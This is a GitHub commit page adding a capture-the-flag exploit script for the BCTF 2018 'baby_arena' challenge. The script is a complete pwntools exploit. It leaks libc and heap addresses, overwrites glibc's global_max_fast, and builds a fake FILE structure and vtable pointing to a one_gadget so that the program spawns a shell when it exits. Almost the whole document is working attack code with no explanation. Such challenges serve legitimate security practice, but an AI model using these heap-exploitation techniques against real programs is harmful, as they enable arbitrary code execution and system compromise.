Commit 1c4d5fc

committed

modify global_max_fast; FSOP

1 parent ac35165 commit 1c4d5fcCopy full SHA for 1c4d5fc

File tree

2 files changed

+73

-0

lines changed

bctf2018_baby_arena
- a83f5901-8f95-49cc-8525-89fef33eef71.i64
- solve.py

2 files changed

+73

-0

lines changed

`‎bctf2018_baby_arena/a83f5901-8f95-49cc-8525-89fef33eef71.i64‎`

0 Bytes

Binary file not shown.

`‎bctf2018_baby_arena/solve.py‎`

Lines changed: 73 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,73 @@`
	`1`	`+#!/usr/bin/env python`
	`2`	`+# -- coding: utf-8 --`
	`3`	`+`
	`4`	`+from pwn import *`
	`5`	`+from time import sleep`
	`6`	`+context.binary = "./a83f5901-8f95-49cc-8525-89fef33eef71.test"`
	`7`	`+elf = context.binary`
	`8`	`+libc = elf.libc`
	`9`	`+libc.sym['main_arena'] = 0x3c4b20`
	`10`	`+libc.sym['global_max_fast'] = 0x3c67f8`
	`11`	`+libc.sym['one_gadget'] = 0xf02a4`
	`12`	`+`
	`13`	`+def add(size, cont):`
	`14`	`+ io.sendlineafter("4.exit\n", "1")`
	`15`	`+ io.sendlineafter("size\n", str(size))`
	`16`	`+ sleep(0.01)`
	`17`	`+ if len(cont) == size:`
	`18`	`+ io.sendafter("note\n", cont)`
	`19`	`+ sleep(0.01)`
	`20`	`+ else:`
	`21`	`+ io.sendlineafter("note\n", cont)`
	`22`	`+`
	`23`	`+`
	`24`	`+def delete(idx):`
	`25`	`+ io.sendlineafter("4.exit\n", "2")`
	`26`	`+ io.sendlineafter("id:\n", str(idx))`
	`27`	`+`
	`28`	`+def login(name):`
	`29`	`+ io.sendlineafter("4.exit\n", "3")`
	`30`	`+ sleep(0.01)`
	`31`	`+ io.sendafter("name\n", name)`
	`32`	`+ sleep(0.01)`
	`33`	`+ io.sendlineafter("admin\n", "0")`
	`34`	`+`
	`35`	`+def _exit():`
	`36`	`+ io.sendlineafter("4.exit\n", "4")`
	`37`	`+`
	`38`	`+`
	`39`	`+# context.log_level = "debug"`
	`40`	`+io = process("./a83f5901-8f95-49cc-8525-89fef33eef71.test")`
	`41`	`+add(0xf0, '0' * 0xf0)`
	`42`	`+add(0xf0, '1' * 0xf0)`
	`43`	`+add(0xf0, '2' * 0xf0)`
	`44`	`+add(0xf0, '3' * 0xf0)`
	`45`	`+delete(0)`
	`46`	`+add(0xf0, '0' * 8)`
	`47`	`+io.recvuntil("0" * 8)`
	`48`	`+libc.address = u64(io.recvuntil("\x7f")[-6: ] + '0円0円') - libc.sym['main_arena'] - 88`
	`49`	`+success("libc @ {:#x}".format(libc.address))`
	`50`	`+fastbinsY = libc.sym['main_arena'] + 0x8`
	`51`	`+success("fastbinsY @ {:#x}".format(fastbinsY))`
	`52`	`+`
	`53`	`+delete(0)`
	`54`	`+delete(2)`
	`55`	`+`
	`56`	`+add(0xf0, 'xxxxxxxx\xff')`
	`57`	`+io.recvuntil("xxxxxxxx")`
	`58`	`+heap = u64(io.recvuntil("\n", drop = True).ljust(8, '\x00')) >> 12 << 12`
	`59`	`+success("heap @ {:#x}".format(heap))`
	`60`	`+`
	`61`	`+idx = (libc.sym['_IO_list_all'] - 8 - fastbinsY) / 8`
	`62`	`+size = idx * 0x10 + 0x20`
	`63`	`+`
	`64`	`+fake_file = flat('0円' * 16, 0, 1, '0円' * 0xa8, heap + 0x4e0)`
	`65`	`+fake_vtable = flat(libc.sym['one_gadget']) * 0x20`
	`66`	`+add(size, fake_file + fake_vtable)`
	`67`	`+`
	`68`	`+login(flat('aaaaaaaa', libc.sym['global_max_fast'] - 8))`
	`69`	`+`
	`70`	`+delete(2)`
	`71`	`+_exit()`
	`72`	`+`
	`73`	`+io.interactive()`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit 1c4d5fc

File tree

2 files changed

2 files changed

`‎bctf2018_baby_arena/a83f5901-8f95-49cc-8525-89fef33eef71.i64‎`

`‎bctf2018_baby_arena/solve.py‎`

0 commit comments